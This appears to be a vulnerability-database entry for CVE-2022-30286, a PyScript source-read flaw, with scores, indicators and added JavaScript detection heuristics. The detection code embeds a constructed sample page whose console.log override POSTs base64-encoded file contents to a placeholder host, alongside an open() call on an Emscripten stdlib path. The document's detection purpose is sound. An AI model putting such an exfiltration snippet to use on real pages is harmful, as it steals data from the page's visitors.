CVE-2022-30286
published 2022-05-09

CVE-2022-30286: pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.

Priority: P2 (59)
Severity: high, 7.5 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Exploit: public PoC available
EPSS: 13.00% (95.8th percentile)

Affected

1 range
Vendor: pyscript
Product: pyscript
Version range: <= 2022-05-04
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

Path IOC: /lib/python3.10/asyncio/tasks.py
  • Monitor for PyScript applications reading arbitrary paths inside the browser's Emscripten virtual filesystem (e.g. /lib/python3.10/; the PoC refers to it as VMemory) via Python open() calls. This is the core exploitation primitive for CVE-2022-30286.
  • Detect exfiltration of the read file contents via a console.log override that base64-encodes captured output and POSTs it to an attacker-controlled endpoint: look for outbound POST requests with Content-Type: text/plain;charset=utf-8 and a JSON body containing a 'content' key holding base64 data, originating from a PyScript page.
  • Flag PyScript pages (those loading pyscript.js or containing <py-script> tags) whose inline script overrides console.log to intercept printed output; this is the attacker's data-theft mechanism for source code read via CVE-2022-30286.
  • The exploit targets PyScript version 2022-05-04-Alpha specifically; later versions may not expose the same Emscripten virtual filesystem paths to arbitrary open() calls.
  • The exploit was tested against an Ubuntu Apache server. The readable paths (e.g. /lib/python3.10/) are Emscripten virtual paths inside the browser's in-memory filesystem, not paths on the web server's disk, and they may differ across deployment configurations.
  • The exfiltration URL in the PoC is a placeholder (YOURburpcollaborator.net); in real attacks it will be replaced with an attacker-controlled out-of-band collection endpoint, so detections must not rely on that specific domain.
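The two indicators above (a console.log override plus open() on an Emscripten stdlib path in a PyScript page, and the base64 'content' POST with Content-Type text/plain;charset=utf-8) can be turned into simple heuristics. The following is an added example written for this page, not code from the advisory, the PoC or the PyScript project; the sample page and the sample request are constructed here from the description in the bullets, and the collector hostname collab.example is a placeholder.

```javascript
// Added example: heuristics for the CVE-2022-30286 exfiltration pattern described above.
// Constructed sample data only; collab.example is a placeholder, not an observed domain.

const PYSCRIPT_MARKERS = [/<py-script[\s>]/i, /pyscript\.js/i];
// console.log being reassigned to a function, arrow function or async function.
const CONSOLE_OVERRIDE = /console\.log\s*=\s*(function|\(|async|[A-Za-z_$][\w$]*\s*=>)/;
// Python open() on a path inside Pyodide's bundled stdlib in the Emscripten virtual FS.
const VFS_STDLIB_OPEN = /open\s*\(\s*['"]\/lib\/python3\.\d+\//;

function isPyScriptPage(html) {
  return PYSCRIPT_MARKERS.some((re) => re.test(html));
}

// Returns the list of page-level findings; empty when the page is not a PyScript page.
function pageFindings(html) {
  const findings = [];
  if (!isPyScriptPage(html)) return findings;
  if (CONSOLE_OVERRIDE.test(html)) findings.push('console.log override on PyScript page');
  if (VFS_STDLIB_OPEN.test(html)) findings.push('open() on Emscripten stdlib path');
  return findings;
}

function isBase64(s) {
  // Base64 alphabet, correct padding, and long enough to plausibly carry file content.
  return s.length >= 16 && s.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(s);
}

// req = { method, headers (lower-case keys), body (string) }, e.g. from a proxy or
// NetworkObserver log. Matches the exact shape the PoC emits, independent of the host.
function looksLikeExfil(req) {
  if (req.method !== 'POST') return false;
  const ct = String(req.headers['content-type'] || '').toLowerCase().replace(/\s+/g, '');
  if (ct !== 'text/plain;charset=utf-8') return false;
  let parsed;
  try {
    parsed = JSON.parse(req.body);
  } catch {
    return false;
  }
  return Boolean(parsed) && typeof parsed.content === 'string' && isBase64(parsed.content);
}

// Constructed sample page reproducing the mechanisms the bullets describe.
const SAMPLE_PAGE = `<html><head>
<script defer src="https://pyscript.net/alpha/pyscript.js"></script>
<script>
console.log = function (m) {
  fetch("https://collab.example/", {method: "POST",
    headers: {"Content-Type": "text/plain;charset=utf-8"},
    body: JSON.stringify({content: btoa(m)})});
};
</script></head><body>
<py-script>print(open('/lib/python3.10/asyncio/tasks.py').read())</py-script>
</body></html>`;

// Constructed sample request as the override above would emit it.
const SAMPLE_REQUEST = {
  method: 'POST',
  url: 'https://collab.example/',
  headers: { 'content-type': 'text/plain;charset=utf-8' },
  body: JSON.stringify({ content: Buffer.from('import asyncio\n').toString('base64') }),
};

console.log(pageFindings(SAMPLE_PAGE));      // both findings
console.log(looksLikeExfil(SAMPLE_REQUEST)); // true
```

The request check deliberately keys on the content type, body shape and base64 payload rather than the collector hostname, since the PoC's domain is a placeholder. Expect some false positives from legitimate apps that POST base64 JSON with a text/plain content type; correlate with the page-level findings before alerting.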

CVSS provenance

NVD, CVSS v3.1: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
NVD, CVSS v2.0: 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N